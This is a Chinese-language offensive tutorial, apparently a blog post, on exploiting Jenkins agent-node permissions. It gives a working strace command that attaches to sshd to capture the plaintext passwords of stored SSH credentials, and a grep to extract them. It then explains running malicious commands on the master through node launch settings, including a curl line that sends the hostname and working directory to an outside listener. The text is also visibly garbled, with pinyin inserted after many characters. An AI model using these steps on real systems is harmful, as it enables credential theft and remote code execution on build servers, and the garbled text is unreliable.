擁有Jenkins agent權(quán)限的賬號可以對node節(jié)點進行操作，通過添加不同的node可以讓流水線項目在不同的節(jié)點上運行，安裝Jenkins的主機默認(rèn)作為master節(jié)點。

1.Jenkins 添加node獲取明文憑據(jù)

通過添加node節(jié)點，本地監(jiān)聽ssh認(rèn)證，選則憑據(jù)（明文）進行ssh認(rèn)證，拿到密碼。

1.新建節(jié)點-manage nodes功能

2.填寫工作目錄，選擇通過SSH進行遠程節(jié)點身份認(rèn)證，選擇抓取帶*號的憑據(jù)，host key選擇不進行驗證：

3.主機監(jiān)聽：這里監(jiān)聽主機ssh使用的是strace后門，實際也可以使用其他方式進行：

(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 32 2> /tmp/.sshd.log &)

4.保存節(jié)點配置， Jenkins將對主機進行ssh請求：

node節(jié)點認(rèn)證日志（賬號密碼方式）：

5. 查看接受結(jié)果，這種方式獲得的密碼需要自行判斷下起始位置

grep -E 'read\(6, ".+\\0\\0\\0\\.+"' /tmp/.sshd.log

2.通過添加節(jié)點執(zhí)行命令

同樣的，在添加節(jié)點時可以配置在master上執(zhí)行命令去進行其他節(jié)點認(rèn)證，也就可以在master上執(zhí)行惡意命令了。

注意：這里執(zhí)行curl命令時不能使用``直接執(zhí)行系統(tǒng)命令，所以利用時需要更換其他方式。

curl -k ip:9090/`hostname`/`pwd`
env

添加節(jié)點時也可以從控制器執(zhí)行命令，Launch method 選擇 通過在master上執(zhí)行命令的方式：

保存然后launch agent：

可以在Log里面看到命令env的輸出：